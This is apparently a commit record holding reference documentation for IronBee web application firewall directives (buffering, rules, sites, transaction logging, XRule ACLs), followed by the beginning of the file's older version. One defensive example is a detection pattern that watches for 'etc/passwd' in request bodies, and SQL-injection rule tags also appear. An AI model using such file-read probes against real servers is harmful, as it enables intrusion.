\n\n=== RequestBodyLogLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the request body logged to an audit log.\n| Syntax|`RequestBodyLogLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== RequestBuffering\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/disable request buffering.\n| Syntax|`RequestBuffering On \\| Off`\n| Default|`Off`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\nControls request buffering - holding the request during inspection.\nCurrently the HTTP header is always buffered, but this must be enabled\nfor the request body to be buffered.\n\nNOTE: This may be renamed to `RequestBodyBuffering` in a future release.\n\n=== ResponseBodyBufferLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the response body buffer.\n| Syntax|`ResponseBodyBufferLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== ResponseBodyBufferLimitAction\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures what happens when the buffer is smaller than the response body.\n| Syntax|`ResponseBodyBufferLimitAction FlushAll \\| FlushPartial`\n| Default|FlushPartial\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\nWhen `FlushAll` is configured, a transaction with a body larger than\nthe buffer will flush the existing buffer, sending it to the client,\nthen continue to fill the buffer with the remaining data. With\n`FlushPartial` selected, the buffer will be used to keep as much data as\npossible, but any overflowing data will be flushed and sent to the\nclient. 
Response headers will be sent before the first overflow batch.\n\n=== ResponseBodyLogLimit\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the size of the response body logged to an audit log.\n| Syntax|`ResponseBodyLogLimit <limit>`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.9.0\n|===============================================================================\n\n=== ResponseBuffering\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/disable response buffering.\n| Syntax|`ResponseBuffering On \\| Off`\n| Default|`Off`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\nControls response buffering - holding the response during inspection.\nCurrently the HTTP header is always buffered, but this must be enabled\nfor the response body to be buffered.\n\nNOTE: This may be renamed to `ResponseBodyBuffering` in a future release.\n\n=== Rule\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads a rule and, in most contexts, enables the rule for execution in that context.\n| Syntax|`Rule TARGET @operator \"param\" id:1234 rev:1 phase:THE_PHASE ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\n[NOTE]\nLoading a rule will, in most contexts, also enable the rule to be\nexecuted in that context. However, the main configuration context is\nspecial. Loading a rule in the main configuration context will _NOT_\nenable the rule, but just load it into memory so that it can be shared\nby other contexts. You must explicitly use `RuleEnable` in another\ncontext to enable the rule.\n\n=== RuleBasePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the base path where external IronBee rules are loaded.\n| Syntax|`RuleBasePath <path>`\n| Default|The `libexec` directory under the IronBee install prefix.\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== RuleDisable\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Disables a rule from executing in the current configuration context.\n| Syntax|`RuleDisable \"all\" \\| \"id:<id>\" \\| \"tag:<tag>\" ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nRules can be disabled by id or tag. Any number of id or tag modifiers\ncan be specified per directive. All disables are processed after\nenables. See the `RuleEnable` directive for an example.\n\n=== RuleEnable\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enables a rule for execution in the current configuration context.\n| Syntax|`RuleEnable \"all\" \\| \"id:<id>\" \\| \"tag:<tag>\" ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nRules can be enabled by id or tag. 
Any number of id or tag modifiers\ncan be specified per directive. All enables are processed before\ndisables. For example:\n\n------------------------------------------------------------\nInclude \"rules\/big_ruleset.conf\"\n\n<Site foo>\n Hostname foo.example.com\n RuleEnable id:1234\n RuleEnable id:3456 tag:SQLi\n RuleDisable id:5678 tag:experimental tag:heavyweight\n<\/Site>\n------------------------------------------------------------\n\n=== RuleEngineLogData\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the data logged by the rule engine.\n| Syntax|`RuleEngineLogData <options>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|core\n| Version|0.6\n|===============================================================================\n\nThe following data type options are supported:\n\n* *tx* - Log the transaction:\n+\n------------------------------------\nTX_START clientip:port site-hostname\n ...\nTX_END\n------------------------------------\n* *requestLine* - Log the HTTP request line:\n+\n-------------------------------------\nREQ_LINE method uri version-if-given \n-------------------------------------\n* *requestHeader* - Log the HTTP request header:\n+\n----------------------\nREQ_HEADER name: value\n----------------------\n* *requestBody* - Log the HTTP request body, possibly in multiple\nchunks:\n+\n------------------\nREQ_BODY size data\n------------------\n* *responseLine* - Log the HTTP response line:\n+\n--------------------------------\nRES_LINE version status message \n--------------------------------\n* *responseHeader* - Log the HTTP response header:\n+\n----------------------\nRES_HEADER name: value\n----------------------\n* *responseBody* - Log the HTTP response body, possibly in multiple\nchunks:\n+\n------------------\nRES_BODY size data\n------------------\n* *phase* - Log the phase about to execute:\n+\n----------\nPHASE name\n----------\n* *rule* - Log the rule executing:\n+\n--------------------\nRULE_START rule-type\n ...\nRULE_END\n--------------------\n* *target* - Log the target being inspected:\n+\n---------------------------------------------------------------------\nTARGET full-target-name {NOT_FOUND|field-type field-name field-value}\n---------------------------------------------------------------------\n* *transformation* - Log the transformation being executed:\n+\n---------------------------------\nTFN tfn-name(param) {ERROR error}\n---------------------------------\n* *operator* - Log the operator being executed:\n+\n------------------------------------------\nOP op-name(param) TRUE|FALSE {ERROR error}\n------------------------------------------\n* *action* - Log the action being executed:\n+\n---------------------------------------\nACTION action-name(param) {ERROR error}\n---------------------------------------\n* *event* - Log the event being logged:\n+\n--------------------------------------------------------------\nEVENT rule-id type action [confidence\/severity] [csv-tags] msg\n--------------------------------------------------------------\n* *audit* - Log the audit log filename being written:\n+\n------------------------\nAUDIT audit-log-filename\n------------------------\n\nThe following alias options are supported:\n\n* *request* - Alias for: *requestLine*, *requestHeader*, *requestBody*\n* *response* - Alias for: *responseLine*, *responseHeader*,\n*responseBody*\n* *ruleExec* - Alias for: *phase*, *rule*, *target*, *transformation*,\n*operator*, *action*, 
*actionableRulesOnly*\n* *none* - Alias for no data options\n* *all* - Alias for all data options\n* *default* - Alias for: *none*\n\nThe following filter options are supported:\n\n* *actionableRulesOnly* - Filter option indicating that only rules that\nwere actionable (actions executed) are logged - any rule-specific\nlogging is delayed\/suppressed until at least one action is executed.\n\n=== RuleEngineLogLevel\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the logging level at which the rule engine will write logs.\n| Syntax|`RuleEngineLogLevel <level>`\n| Default|`info`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.6\n|===============================================================================\n\n=== RuleExt\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a rule implemented externally, either by loading the rule directly from a file, or referencing a rule that was previously\ndeclared by a module.\n| Syntax|`RuleExt <ext-rule> <modifiers>`\n| Default|None\n| Context|Site, Location\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nTo load a Lua rule:\n\n-------------------------------------------\nRuleExt lua:\/path\/to\/rule.lua phase:REQUEST\n-------------------------------------------\n\n=== RuleMarker\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a rule marker (placeholder) which will not be executed, but instead should be overridden.\n| Syntax|`RuleMarker id:<id> phase:<phase>`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|rules\n| Version|0.5\n|===============================================================================\n\nThe idea is that rule sets can include placeholders for optional custom\nrules which can be overridden, but still allow the rule set writer to\nmaintain execution order.\n\nTo mark and later replace a rule:\n\n-------------------------------------------------------------------------------\nRule ARGS @rx foo id:1 rev:1 phase:REQUEST\n\n# Allow the administrator to set MY_VALUE in another context\nRuleMarker id:2 phase:REQUEST\n\nRule MY_VALUE @gt 0 id:3 rev:1 phase:REQUEST setRequestHeader:X-Foo:%{MY_VALUE}\n\n<Site test>\n    Hostname *\n\n    Rule &ARGS @gt 5 id:2 phase:REQUEST setvar:MY_VALUE=5\n    RuleEnable all\n<\/Site>\n-------------------------------------------------------------------------------\n\nIn the above example, rule id:2 in the main context would be replaced by\nthe rule id:2 in the site context, then the rules would execute id:1,\nid:2 and id:3. 
If Rule id:2 was not replaced in the site context, then\nrules would execute id:1 then id:3, as id:2 is only a marker\n(placeholder).\n\n=== RuleTrace\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable rule tracing for a rule.\n| Syntax|`RuleTrace <rule-id>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|rules\n| Version|0.9\n|===============================================================================\n\n=== RuleTraceFile\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the rule tracing output file.\n| Syntax|`RuleTraceFile <trace-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|rules\n| Version|0.9\n|===============================================================================
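\n\nAs a sketch (the file path and rule id are hypothetical), tracing a single rule to a dedicated file:\n\n---------------------------------------------\nRuleTraceFile \/var\/log\/ironbee\/rule-trace.log\nRuleTrace 1234\n---------------------------------------------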
\n\n=== SQLiPatternSet\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Create a named libinjection pattern set from a file.\n| Syntax|`SQLiPatternSet <name> <pattern-file>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|rules\n| Version|0.9\n|===============================================================================\n\nThe pattern file is just a text file with one pattern per line.\n\n=== SensorHostname\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify the sensor hostname.\n| Syntax|`SensorHostname <hostname>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis is just metadata about the sensor which is used in the auditlog.\n\n=== SensorId\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Unique sensor identifier.\n| Syntax|`SensorId <id>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nTODO: Can we make this directive so that, if not defined, we attempt to\ndetect server hostname and use that as ID?\n\n=== SensorName\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Sensor name.\n| Syntax|`SensorName <name>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nThis is just metadata about the sensor which is used in the auditlog.\n\n=== Service\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Maps IP and Port to a site.\n| Syntax|`Service <ip>:<port>`\n| Default|`*:*` (any)\n| Context|Site\n|Cardinality|0..n\n| Module|core\n| Version|0.6\n|===============================================================================\n\nThe `Service` directive establishes a mapping between a Site and one or\nmore IP\/Port pairs. To map hostnames to a Site, see the `Hostname` directive.\n\nIn the simplest case, a site will occupy a single IP\/Port pair:\n\n-----------------------\nService 192.168.32.5:80\n-----------------------\n\nMore often than not, however, several mappings will be used:\n\n------------------------\nService 192.168.32.5:80\nService 192.168.32.6:443\n------------------------\n\nWildcards are permitted for both IP and Port:\n\n----------------------\nService *:80\nService 192.168.32.5:*\n----------------------\n\nTo match any IP address on any Port (which you will need to do in\ndefault sites), use wildcards for both IP and Port, which is the default\nif no `Service` directive is specified for a site:\n\n-----------\nService *:*\n-----------\n\n=== Set\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Set a named configuration parameter.\n| Syntax|`Set <name> <value>`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n.Example\n----------------------------------------------\nSet MY_VAR \"some value\"\n----------------------------------------------\n\n=== Site\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Define a site.\n| Syntax|`<Site name>...<\/Site>`\n| Default|None\n| Context|Main\n|Cardinality|0..n\n| Module|core\n| Version|0.1\n|===============================================================================\n\nA site is one of the main concepts in the configuration of IronBee. The idea\nis to have an element to correspond to real-life web sites. With most web\nsites there is a one-to-one mapping to domain names, but our mapping mechanism\nis quite flexible: you can have one site per domain name, many domain names for\na single site, or even have one domain name shared among several sites.\n\nAt the highest level, a configuration will contain one or more sites.\nFor example:\n\n----------------------------------------\n<Site site1>\n    Service *:80\n    Hostname site1.example.com\n    Hostname site1-alternate.example.com\n<\/Site>\n\n<Site site2>\n    Service *:80\n    Service 10.0.1.2:443\n    Hostname site2.example.com\n<\/Site>\n\n<Site default>\n    Service *:*\n    Hostname *\n<\/Site>\n----------------------------------------\n\nBefore it can process a transaction, IronBee will examine the current\nconfiguration looking for a site to assign the transaction to. Sites are\nprocessed in the configured order and the first matching site is\nchosen. A default site, using wildcards, can be specified as the last\nsite to catch transactions when all previous sites fail to match. 
The `Site` directive only\nestablishes configuration boundaries and assigns a unique handle to each\nsite; the `Service` and `Hostname` directives are responsible for the\nmapping.\n\n=== SiteId\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Unique site identifier.\n| Syntax|`SiteId <id>`\n| Default|None\n| Context|Site\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\nTODO: Can we make this directive so that, if not defined, we attempt to\ndetect site hostname and use that as ID?\n\n=== StreamInspect\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Creates a streaming inspection rule, which inspects data as it becomes available, outside rule phases.\n| Syntax|`StreamInspect TARGET @op <param> ...`\n| Default|None\n| Context|Site, Location\n|Cardinality|0..n\n| Module|rules\n| Version|0.4\n|===============================================================================\n\nNormally, rules run in one of the available phases, which happen at\nstrategic points in the transaction lifecycle. Phase rules are convenient to\nwrite, because all the relevant data is available for inspection.\nHowever, there are situations when it is not possible to have access to\nall of the data in a phase. This is the case, for example, when a\nrequest body is very large, or when buffering is not allowed.\n\nStreaming rules are designed to operate in these circumstances. They are\nable to inspect data as it becomes available, be it a dozen bytes or\na single byte.\n\nThe syntax of the `StreamInspect` directive is similar to that of `Rule`, but\nthere are several restrictions:\n\n* Only one input can be used. This is because streaming rules attach to\na single data source.\n* The `phase` modifier cannot be used, as streaming rules operate\noutside of phases.\n* Only `REQUEST_BODY_STREAM` and `RESPONSE_BODY_STREAM` can be used as\ninputs.\n* Only the `pm` and `dfa` operators can be used.\n* Transformation functions are not yet supported.
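\n\nA minimal sketch (the pattern and id are hypothetical, and it is assumed the usual rule modifiers other than `phase` apply), scanning the request body stream as data arrives:\n\n----------------------------------------------------------------\nStreamInspect REQUEST_BODY_STREAM @pm \"etc\/passwd\" id:1234 rev:1\n----------------------------------------------------------------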
\n\n=== TrustedProxyIPs\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Specify a list of networks or IP addresses to trust for X-Forwarded-For handling.\n| Syntax|`TrustedProxyIPs <cidr> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|trusted_proxy\n| Version|0.9\n|===============================================================================\n\nThis is a list of IP addresses or CIDR blocks that should be trusted or\nnot trusted when handling the X-Forwarded-For header.\n\nNetworks\/IPs may be prefixed with \"+\" to indicate they are trusted, or \"-\"\nto indicate they are untrusted. If the first entry in the list does not have\na \"+\" or \"-\", the trusted\/untrusted list is cleared and the entry is\ntreated as trusted.\n\nExamples:\n\nTrust only 192.168.1.0\/24:\n\n----------------------------------------\nTrustedProxyIPs 192.168.1.0\/24\n----------------------------------------\n\nTrust all but 10.10.10.10:\n\n--------------------------------------\nTrustedProxyIPs -10.10.10.10\n--------------------------------------\n\n=== TrustedProxyUseXFFHeader\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable the use of the X-Forwarded-For header.\n| Syntax|`TrustedProxyUseXFFHeader On\\|Off`\n| Default|`On`\n| Context|Any\n|Cardinality|0..1\n| Module|trusted_proxy\n| Version|0.9\n|===============================================================================\n\nIf enabled, the last address listed in the X-Forwarded-For header is used\nas the remote address. See _TrustedProxyIPs_ to configure the list of trusted\nproxies. The default behaviour is to trust no proxies.\n\n=== TxDump\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Diagnostics directive to dump (log) transaction data for debugging purposes.\n| Syntax|`TxDump <event> <destination> [<data> ...]`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|devel\n| Version|0.7\n|===============================================================================\n\nThe event field allows indicating _when_ you want the data to be written\nand is one of:\n\n* *TxStarted* - Transaction started.\n* *TxProcess* - Transaction processing (between request and response).\n* *TxContext* - Transaction configuration context chosen.\n* *RequestStart* - Request started.\n* *RequestHeader* - Request headers have been processed.\n* *Request* - Full request has been processed.\n* *ResponseStart* - Response started.\n* *ResponseHeader* - Response headers have been processed.\n* *Response* - Full response has been processed.\n* *TxFinished* - Transaction is finished.\n* *Logging* - Logging phase.\n* *PostProcess* - Post-processing phase.\n\nThe destination field allows specifying _where_ you want to write the\ndata and is one of the following:\n\n* *stderr* - Write to standard error.\n* *stdout* - Write to standard output.\n* *ib* - Write to the IronBee log file.\n* *file:\/\/* - Write to an arbitrary file, optionally appending to the\nfile if the last character is a *+* character.\n\nThe data field is optional and allows specifying _what_ is to be\nwritten. 
This can be prefixed with a `+` or a `-` character to enable or\ndisable the data.\n\n* *Basic* - Basic TX data.\n* *Context* - Configuration context data.\n* *Connection* - Connection data.\n* *ReqLine* - HTTP request line.\n* *ReqHdr* - HTTP request header.\n* *RspLine* - HTTP response line.\n* *RspHdr* - HTTP response header.\n* *Flags* - Transaction flags.\n* *Args* - Request arguments.\n* *Data* - Transaction data.\n* *Default* - Default is \"Basic ReqLine RspLine\".\n* *Headers* - All HTTP headers.\n* *All* - All data.\n\nExamples:\n\n----------------------------------------------\nTxDump TxContext ib Basic +Context\nTxDump PostProcess file:\/\/\/tmp\/tx.txt All\nTxDump Logging file:\/\/\/var\/log\/ib\/all.txt+ All\nTxDump PostProcess stdout All\n----------------------------------------------\n\n=== TxLogEnabled\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/Disable the transaction log.\n| Syntax|`TxLogEnabled On \\| Off`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|txlog\n| Version|0.9\n|===============================================================================\n\n=== TxLogIronBeeLog\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable writing the transaction log to the IronBee log.\n| Syntax|`TxLogIronBeeLog`\n| Default|None\n| Context|Main\n|Cardinality|0..1\n| Module|txlog\n| Version|0.9\n|===============================================================================
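\n\nFor example, to turn the transaction log on and write it to the IronBee log:\n\n---------------\nTxLogEnabled On\nTxLogIronBeeLog\n---------------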
\n\n=== TxVars\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Enable\/Disable additional transaction vars for testing.\n| Syntax|`TxVars On \\| Off`\n| Default|None\n| Context|Any\n|Cardinality|0..1\n| Module|txvars\n| Version|0.9\n|===============================================================================\n\nThis will enable additional vars (data fields)::\n* *ENGINE_ID* - Engine ID\n* *SENSOR_ID* - Sensor ID\n* *CONN_ID* - Connection ID\n* *CONN_START* - When the connection started\n* *TX_ID* - Transaction ID\n* *TX_START* - When the transaction started\n* *CONTEXT_NAME* - Name of the selected configuration context\n* *SITE_ID* - Selected site ID\n* *SITE_NAME* - Selected site name\n* *LOCATION_PATH* - Selected location path\n\n=== XRuleGeo\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended geo rule.\n| Syntax|`XRuleGeo <country> <action> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleGeo is used to set up Geo (country) based rules.\n\nExample:\n--------------------------------------\nXRuleGeo US scaleThreat=0.8 priority=1\n--------------------------------------\n\nFor available actions, see `XRuleIpv4`.\n\n=== XRuleIpv4\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended IPv4 rule.\n| Syntax|`XRuleIpv4 <cidr> <action> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleIpv4 is used to set up IPv4 based rules.\n\nExample:\n-----------------------------------------\nXRuleIpv4 192.168.0.0\/16 block priority=1\n-----------------------------------------\n\nAvailable Actions:\n\n* *priority=N* - Set rule priority.\n* *block* - Block the transaction.\n* *allow* - Allow the transaction.\n* *enableBlockingMode* - Enable blocking mode for this transaction.\n* *disableBlockingMode* - Disable blocking mode for this transaction.\n* *scaleThreat=X* - Scale threat calculation (update\n*XRULES:SCALE_THREAT*) by floating point multiplier, X, for this\ntransaction.\n* *enableRequestHeaderInspection* - Enable request header inspection for\nthis transaction.\n* *disableRequestHeaderInspection* - Disable request header inspection\nfor this transaction.\n* *enableRequestURIInspection* - Enable request URI inspection for this\ntransaction.\n* *disableRequestURIInspection* - Disable request URI inspection for\nthis transaction.\n* *enableRequestParamInspection* - Enable request parameter inspection\nfor this transaction.\n* *disableRequestParamInspection* - Disable request parameter inspection\nfor this transaction.\n* *enableRequestBodyInspection* - Enable request body inspection for\nthis transaction.\n* *disableRequestBodyInspection* - Disable request body inspection for\nthis transaction.\n* *enableResponseHeaderInspection* - Enable response header inspection\nfor this transaction.\n* *disableResponseHeaderInspection* - Disable response header inspection\nfor this transaction.\n* *enableResponseBodyInspection* - Enable response body inspection for\nthis transaction.\n* *disableResponseBodyInspection* - Disable response body inspection for\nthis transaction.\n\n=== XRuleIpv6\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended IPv6 rule.\n| Syntax|`XRuleIpv6 <cidr> <action> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. 
The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleIpv6 is used to set up IPv6 based rules.\n\nExample:\n----------------------------------\nXRuleIpv6 ::1\/128 block priority=1\n----------------------------------\n\nFor available actions, see `XRuleIpv4`.\n\n=== XRulePath\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended path rule.\n| Syntax|`XRulePath <path> <action> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRulePath is used to set up URI path based rules.\n\nExample:\n--------------------------------------------------------------\nXRulePath \/admin scaleThreat=1.5 enableBlockingMode priority=1\n--------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`.\n\n=== XRuleRequestContentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended request content type rule.\n| Syntax|`XRuleRequestContentType <content-type> <action> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleRequestContentType is used to set up request content type based\nrules.\n\nExample:\n-------------------------------------------------------------------------------------\nXRuleRequestContentType application\/x-www-form-urlencoded enableRequestBodyInspection\n-------------------------------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`.\n\n=== XRuleResponseContentType\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended response content type rule.\n| Syntax|`XRuleResponseContentType <content-type> <action> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. 
The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleResponseContentType is used to set up response content type based\nrules.\n\nExample:\n----------------------------------------------------------------\nXRuleResponseContentType image\/png disableResponseBodyInspection\n----------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`.\n\n=== XRuleTime\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Add an extended time rule.\n| Syntax|`XRuleTime <time-spec> <action> ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| Module|xrules\n| Version|0.8\n|===============================================================================\n\n[NOTE]\nXRules, or extended rules, are rules that implement common operations,\nsuch as Access Control Lists (ACLs). These extended rules hide much of\nthe complexities of normal rules so that these common operations are\neasier to use. The priority allows conflicts to be resolved - higher\npriority (lower numerical value) rules will override lower priority\nrules.\n\nAn XRuleTime is used to set up date\/time based rules.\n\nThe time-spec is in the format: `[!]DOW(,DOW)*@HH:MM-HH:MM[-|+]ZZZZ`:\n\n* *!* - Invert rule.\n* *DOW* - Day of Week (0=Sunday - 6=Saturday).\n* *HH* - Two digit hour (24-hr format).\n* *MM* - Two digit minute.\n* *[-|+]ZZZZ* - Timezone offset from GMT.\n\nExample:\n------------------------------------------------------------------------\nXRuleTime !1,2,3,4,5@08:00-17:00-0500 scaleThreat=1.5 enableBlockingMode\n------------------------------------------------------------------------\n\nFor available actions, see `XRuleIpv4`.\n","old_contents":"IronBee Configuration\n---------------------\n\nThe IronBee configuration is loaded from the server container.\nThe syntax is similar to the Apache httpd server configuration.\nThe following rules apply:\n\n* Escape sequences are as in JavaScript (section 7.8.4 in ECMA-262),\nexcept within PCRE regular expression patterns, where PCRE escaping is\nused\n* Lines that begin with `#` are comments\n* Lines are continued on the next line when `\\` is the last character on\na line\n\nThe IronBee configuration defines general configuration as well as site\nand location mappings, which can each have their own configuration.\n\n-----------------------------------------------\n# Main Configuration\nSensorId 13AABA8F-2575-4F93-83BF-C87C1E8EECCE\n...\n\n# Site1\n<Site site1>\n    SiteId 0B781B90-CE3B-470C-952C-5F2878EFFC05\n    Hostname site1.example.com\n    Service 10.0.1.100:80\n\n    ...\n\n    <Location \/directory1>\n        ...\n    <\/Location>\n<\/Site>\n\n# Site2\n<Site site2>\n    SiteId 8B3BA3DE-2727-4737-9230-4A1D110E6C87\n    Hostname site2.example.com\n    Service 10.0.5.100:80\n\n    ...\n<\/Site>\n\n# Default Site\n<Site default>\n    SiteId F89E43B3-EB96-44F0-BE1C-B4673B96DF9C\n    Hostname *\n    Service *:*\n\n    ...\n<\/Site>\n-----------------------------------------------\n\nThe following is a reference for all IronBee directives where the\ncontext refers to the possible locations within the configuration file.\n\n=== Action\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Loads a rule that will always execute its actions and, in most contexts, enables the rule for execution in that context.\n| Syntax|`Action id:1234 rev:1 phase:THE_PHASE ...`\n| Default|None\n| Context|Any\n|Cardinality|0..n\n| 
Module|rules\n| Version|0.4\n|===============================================================================\n\nThis is shorthand and functionally equivalent to a rule with no targets\nand an operator that always returns true. Internally this is represented as\nfollows.\n\n-----------------------------------------------\n# These are equivalent\nRule NULL @nop \"\" ...\nAction ...\n-----------------------------------------------\n\n[NOTE]\nLoading a rule will, in most contexts, also enable the rule to be\nexecuted in that context. However, the main configuration context is\nspecial. Loading a rule in the main configuration context will _NOT_\nenable the rule, but just load it into memory so that it can be shared\nby other contexts. You must explicitly use `RuleEnable` in another\ncontext to enable the rule.\n\n=== AuditEngine\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the audit log engine.\n| Syntax|`AuditEngine On \\| Off \\| RelevantOnly`\n| Default|`RelevantOnly`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.3\n|===============================================================================\n\nSetting `AuditEngine` to `RelevantOnly`, the default, does not log any\ntransactions in itself. Instead, further activity (e.g., a rule match)\nis required for a transaction to be recorded. Setting `AuditEngine` to\n`On` activates audit logging for *all transactions*, which may cause a\nlarge amount of data to be logged.\n\n=== AuditLogBaseDir\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the directory where individual audit log entries will be stored. This also serves as the base directory for `AuditLogIndex` if it uses a relative path.\n| Syntax|`AuditLogBaseDir <path>`\n| Default|`\"\/var\/log\/ironbee\"`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.3\n|===============================================================================\n\n=== AuditLogDirMode\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the directory mode that will be used for new directories created during audit logging.\n| Syntax|`AuditLogDirMode <octal-mode>`\n| Default|`0700`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| Version|0.4\n|===============================================================================\n\n=== AuditLogFileMode\n[cols=\">h,<9\"]\n|===============================================================================\n|Description|Configures the file mode that will be used when creating individual audit log files.\n| Syntax|`AuditLogFileMode <octal-mode>`\n| Default|`0600`\n| Context|Any\n|Cardinality|0..1\n| Module|core\n| 